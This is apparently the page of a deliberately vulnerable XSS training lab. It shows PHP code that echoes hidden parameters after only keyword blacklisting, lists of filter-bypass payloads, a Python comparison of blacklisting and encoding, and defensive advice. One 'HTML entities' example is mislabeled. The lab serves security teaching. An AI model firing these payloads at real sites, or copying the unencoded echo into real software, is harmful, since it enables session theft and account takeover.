Multiple Parameter Blacklist Filter XSS Lab

Test XSS with consistent blacklist filtering across multiple hidden parameters

Multiple Parameter Challenge

Lab Overview

This lab demonstrates a consistent blacklist filtering approach applied to multiple hidden parameters. The 'id', 'cat', 'page', and 'number' parameters all use the same blacklist filter, making this a comprehensive test of bypass techniques.

  • Consistent Blacklist Filtering: All hidden parameters (id, cat, page, number) use the same str_replace() filter to remove specific dangerous keywords.
  • Multiple Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them all (hint: id, cat, page, number).
Parameter Security Levels:
  • Secure: fname, lname - Uses htmlspecialchars()
  • Filtered: id, cat, page, number - Same blacklist filter
  • Consistent Filtering: Same filter applied to all hidden parameters
  • Multiple Vectors: Multiple parameters to test bypass techniques
Blacklist Filter Details:

All filtered parameters remove these keywords: 'details', 'alert', 'confirm', 'prompt', 'eval', 'ontoggle'

Parameters filtered with the blacklist: id, cat, page, number
Secure Parameters (fname, lname):
Input: <script>alert(1)</script>
Output: &lt;script&gt;alert(1)&lt;/script&gt;
Blacklist Filtered (id, cat, page, number):
Input: <details ontoggle=alert(1)>
Output: < ontoggle=()>
The same blacklist filter is consistently applied to all hidden parameters, making it a good test case for bypass techniques.
Overall Security Level: Medium Vulnerability

Objective: Discover all hidden parameters and find ways to bypass the consistent blacklist filtering to execute XSS payloads.

Backend Source Code
<?php
// Visible form fields: output-encoded with htmlspecialchars(), so any markup
// in the value is rendered as text rather than interpreted by the browser.
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Hidden parameters: keyword blacklist only. str_replace() removes each
// listed keyword and the result is echoed without any output encoding.
elseif(isset($_GET["id"])){
    $arr = array('details','alert','confirm','prompt','eval','ontoggle');
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
elseif(isset($_GET["cat"])){
    $arr = array('details','alert','confirm','prompt','eval','ontoggle');
    $re = str_replace($arr, '', $_GET['cat']);
    echo $re;
}
elseif(isset($_GET["page"])){
    $arr = array('details','alert','confirm','prompt','eval','ontoggle');
    $re = str_replace($arr, '', $_GET['page']);
    echo $re;
}
elseif(isset($_GET["number"])){
    $arr = array('details','alert','confirm','prompt','eval','ontoggle');
    $re = str_replace($arr, '', $_GET['number']);
    echo $re;
}
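To make the difference between the two code paths concrete, here is an added Python model of the lab's backend (not the lab's own code): blacklist_filter() mirrors the str_replace() keyword removal, html_encode() mirrors htmlspecialchars() with ENT_QUOTES, and still_has_markup() is an assumed defender-side check that asks whether the echoed output can still open an HTML tag in the page's body-text context. Running it on the sample inputs from this page shows which path actually neutralizes them.

```python
import re

# Keyword blacklist and parameter groups exactly as the lab page lists them.
BLACKLIST = ["details", "alert", "confirm", "prompt", "eval", "ontoggle"]
FILTERED_PARAMS = ["id", "cat", "page", "number"]
ENCODED_PARAMS = ["fname", "lname"]


def blacklist_filter(value: str) -> str:
    """Model of str_replace($arr, '', $value): every keyword is removed in
    array order and the result is echoed as raw HTML."""
    for keyword in BLACKLIST:
        value = value.replace(keyword, "")
    return value


def html_encode(value: str) -> str:
    """Model of htmlspecialchars($value, ENT_QUOTES): '&' is encoded first so
    the entities produced for the other four characters are not re-encoded."""
    return (value.replace("&", "&amp;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;")
                 .replace('"', "&quot;")
                 .replace("'", "&#039;"))


# Assumed check: in HTML body-text context an injection has to open a tag, so
# a '<' followed by a letter in the echoed output is what a defender looks for.
TAG_OPEN_RE = re.compile(r"<\s*[a-zA-Z]")


def still_has_markup(output: str) -> bool:
    return TAG_OPEN_RE.search(output) is not None


def render(param: str, value: str) -> str:
    """Apply the lab's per-parameter handling to one GET value."""
    if param in ENCODED_PARAMS:
        return html_encode(value)
    if param in FILTERED_PARAMS:
        return blacklist_filter(value)
    raise ValueError(f"unknown parameter: {param}")


if __name__ == "__main__":
    # Sample inputs taken from this page; constructed usage only.
    for param, value in [("fname", "<script>alert(1)</script>"),
                         ("id", "<details ontoggle=alert(1)>"),
                         ("cat", "<svg onload=window['al'+'ert'](1)>")]:
        out = render(param, value)
        print(f"{param:6} -> {out!r:48} tag still opens: {still_has_markup(out)}")
```

The encoded path never leaves a '<' in the output, whereas the blacklist path passes the concatenation payload through untouched, which is the page's central point.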
Test Input Forms
Visible Parameters (HTML Encoded)
  • fname: uses htmlspecialchars() encoding
  • lname: uses htmlspecialchars() encoding
Hidden Parameters (Blacklist Filtered)
Hint: Multiple parameters (id, cat, page, number) are hidden but implemented with the same blacklist filtering.
  • id: uses blacklist filtering - removes specific keywords
  • cat: uses the same blacklist filtering as the id parameter
  • page: uses the same blacklist filtering as the other parameters
  • number: uses the same blacklist filtering as the other parameters
XSS Bypass Techniques for This Blacklist
Alternative Tags/Events (Not Filtered):
  • <script>window['al'+'ert'](1)</script>
  • <img src=x onerror=window['al'+'ert'](1)>
  • <body onload=window['al'+'ert'](1)>
  • <svg onload=window['al'+'ert'](1)>
JavaScript String Concatenation:
  • <script>window['al'+'ert'](1)</script>
  • <script>this['al'+'ert'](1)</script>
  • <script>self['al'+'ert'](1)</script>
  • <script>top['al'+'ert'](1)</script>
Alternative Functions (Not Filtered):
  • <script>print()</script>
  • <script>open()</script>
  • <script>console.log(1)</script>
  • <script>setTimeout('al'+'ert(1)')</script>
Encoding Bypass Techniques:
  • <script>window['alert'](1)</script> (HTML entities)
  • <script>window['\x61lert'](1)</script> (Hex encoding)
  • <script>window['\141lert'](1)</script> (Octal encoding)
  • <script>window[`al${''}ert`](1)</script> (Template literals)
Blacklist Filter Analysis:

The current filter removes these exact strings: 'details', 'alert', 'confirm', 'prompt', 'eval', 'ontoggle'

This means these techniques can bypass the filter:

  • Using string concatenation to build blocked function names
  • Using alternative functions that aren't in the blacklist
  • Using character encoding (HTML entities, hex, octal)
  • Using template literals or other string manipulation
  • Using global objects (window, self, this, top) to access functions
Filter Limitations:
  • Doesn't prevent string concatenation
  • Doesn't handle encoding variations
  • Doesn't block alternative functions
  • Doesn't prevent access via global objects
Security Implications

Multiple parameter filtering demonstrates:

  • Consistent filtering across parameters is good practice
  • Blacklists are still vulnerable to creative bypasses
  • Multiple parameters provide multiple attack vectors
  • String manipulation can easily bypass keyword filters
  • Global objects provide multiple ways to access functions
  • Whitelist approaches are more secure than blacklists
Best Practices

For secure web applications:

  • Use context-aware output encoding instead of blacklists
  • Implement strict Content Security Policy (CSP) headers
  • Validate input based on expected data types
  • Use security libraries/frameworks for output encoding
  • Test all parameters with various bypass techniques
  • Apply consistent security controls across all parameters
  • Assume blacklists will be bypassed with enough effort
Real-World Security Implications
Common Multi-Parameter Vectors:
  • Search and filter parameters: Often multiple parameters with similar filtering
  • Pagination parameters: page, limit, offset often have inconsistent validation
  • API endpoints: Multiple query parameters with varying security
  • Form parameters: Various fields may share similar but insufficient filtering
Impact of Multi-Parameter Bypass:
  • Multiple entry points for XSS attacks
  • Increased attack surface
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Phishing attacks from within the application
  • Complete application compromise
Advanced Prevention Strategies:
  • Context-aware encoding: Use proper encoding for each output context
  • Input validation: Validate based on expected data types and patterns
  • Content Security Policy: Implement strict CSP headers
  • Security testing: Test all parameters with automated and manual techniques
  • Parameter discovery: Use tools to find all parameters during testing
  • Security headers: Implement X-XSS-Protection, X-Content-Type-Options